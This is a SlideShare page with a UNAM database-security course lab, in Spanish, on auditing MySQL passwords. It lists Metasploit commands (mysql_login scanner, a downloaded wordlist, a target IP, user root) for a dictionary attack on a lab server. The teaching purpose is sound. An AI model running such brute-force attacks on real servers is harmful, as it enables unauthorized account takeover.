Actividad No. 1.9: Auditoria de contraseñas en MySQL

543 visualizaciones

Publicado el

Universidad Nacional Autónoma de México
Facultad de Contaduría y Administración
Diplomado Diseño y Administración de Base de Datos
Módulo 6. Seguridad de Bases de Datos

Publicado en: Educación
0 comentarios
0 recomendaciones
Estadísticas
Notas
  • Sé el primero en comentar

  • Sé el primero en recomendar esto

Sin descargas
Visualizaciones
Visualizaciones totales
543
En SlideShare
0
De insertados
0
Número de insertados
182
Acciones
Compartido
0
Descargas
37
Comentarios
0
Recomendaciones
0
Insertados 0
No insertados

No hay notas en la diapositiva.

Actividad No. 1.9: Auditoria de contraseñas en MySQL

  1. 1. Universidad  Nacional  Autónoma  de  México   Facultad  de  Contaduría  y  Administración   Diplomado  Diseño  y  Administración  de  Base  de  Datos   Módulo  6.  Seguridad  de  Bases  de  Datos     Elaboró:  Francisco  Medina  López     1   Actividad  No.  1.9:  Auditoria  de   contraseñas  en  MySQL   Antecedentes       Requerimientos     Dos   equipos   de   cómputo:   Uno   con   el   sistema   operativo   CentOS   que   deberá   tener   configurado  el  manejador  de  base  de  datos  MySQL  como  lo  indica  la  Actividad  No.  1.4:   Instalación  y    Configuración  de  MySQL  en  CentOS  6  y  con  la  base  de  datos  world  creada   como  lo  indica  la  Actividad  No.  1.6:  Creación  de  bases  de  datos  en  MySQL.       El  segundo  equipo  de  cómputo  con  el  sistema  operativo  Kali  Linux  con  los  parámetros   de  red  correctamente  configurados  como  lo  indica  la  Actividad  No.  1.2:  Introducción  a   Kali  Linux.       Figura  No.    1:  Modelo  cliente-­‐servidor      
  2. 2. Universidad  Nacional  Autónoma  de  México   Facultad  de  Contaduría  y  Administración   Diplomado  Diseño  y  Administración  de  Base  de  Datos   Módulo  6.  Seguridad  de  Bases  de  Datos     Elaboró:  Francisco  Medina  López     2     Instrucciones     Las  siguientes  instrucciones  deberán  ejecutarse  desde  el  sistema  operativo  Kali   Linux:     1. Abre  una  terminal  usando  el  ícono   ,  ubicado  en  el  panel  superior.     2. Descarga  el  archivo  diccionario  que  será  usado  más  adelante:     wget  –c    http://mod6sbd.capacitacionentics.com/diccionario           3. Inicia  los  servicios  requeridos  por  el  framework  de  explotación  metasploit,   ejecutando  los  siguientes  comandos  en  una  terminal  del  sistema:     service  postgresql  start   service  metasploit  start           4. Inicia  la  consola  del  framework  de  explotación  metasploit  con  el  comando:     msfconsole    
  3. 3. Universidad  Nacional  Autónoma  de  México   Facultad  de  Contaduría  y  Administración   Diplomado  Diseño  y  Administración  de  Base  de  Datos   Módulo  6.  Seguridad  de  Bases  de  Datos     Elaboró:  Francisco  Medina  López     3       5. Ejecuta  los  siguientes  comandos  dentro  de  metasploit:   a. use  auxiliary/scanner/mysql/mysql_login         b. show  options     c. set  RHOSTS  10.211.55.12   d. set  USERNAME  root   e. set  PASS_FILE  /root/diccionario   f. run  
  4. 4. Universidad  Nacional  Autónoma  de  México   Facultad  de  Contaduría  y  Administración   Diplomado  Diseño  y  Administración  de  Base  de  Datos   Módulo  6.  Seguridad  de  Bases  de  Datos     Elaboró:  Francisco  Medina  López     4       6. Después  de  algunos  instantes,  metasploit  completa  el  ataque  por  diccionario  a   contraseñas  de  MySQL  

×